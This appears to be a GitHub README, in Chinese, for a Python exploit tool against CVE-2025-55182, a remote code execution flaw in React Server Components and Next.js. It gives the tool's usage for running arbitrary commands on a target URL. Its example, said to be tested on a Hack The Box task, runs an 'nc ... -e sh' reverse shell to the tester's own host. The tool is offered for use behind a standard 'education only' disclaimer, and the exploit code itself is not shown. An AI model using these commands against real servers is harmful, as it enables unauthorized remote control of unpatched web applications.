Industri4l-H3ll-Xpl0it3rs/CVE-2025-55182-React2Shell

# CVE-2025-55182-React2Shell 由 [infrar3d](https://github.com/Infrar3dd) 发现并利用 一个严重等级为 10.0 的严重漏洞，影响 React.js 的服务端使用，在 React.js 中跟踪为 CVE-2025-55182，在 Next.js 框架中特指为 CVE-2025-66478。 该漏洞由 Lachlan Davidson 于 2025 年 11 月 29 日（太平洋时间）负责任地**向 Meta 团队披露**。初始披露和补丁发布由 React 和 Vercel 于 2025 年 12 月 3 日（太平洋时间）完成。（原文：https://react2shell.com/） ### 用法： ``` python3 CVE-2025-55182.py --help usage: python CVE-2025-55182.py -u [-c COMMAND] CVE-2025-55182 - React Server Components RCE Exploit options: -h, --help show this help message and exit -u, --url URL Target URL (required) -c, --command COMMAND Command to execute on target (default: id) Example: python CVE-2025-55182.py -u http://target.com -c "whoami" ``` ### 示例（在 HTB 任务上测试）： ``` python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh" ``` ### ⚠️ 免责声明 ⚠️ 此软件和概念验证代码**仅供教育和研究目的提供**。 * 作者对因本程序造成的任何误用或损害**概不负责**。 * **请勿**在没有明确**事先许可**的情况下对任何系统使用此工具。 * 未经同意使用此工具攻击目标是**非法的**。 您有责任遵守所有适用法律。**请道德且负责任地使用。**

标签：CISA项目, CVE-2025-55182, Python, React.js, 代码执行, 威胁模拟, 情报收集, 教育研究, 无后门, 服务器端漏洞, 漏洞披露, 漏洞研究, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护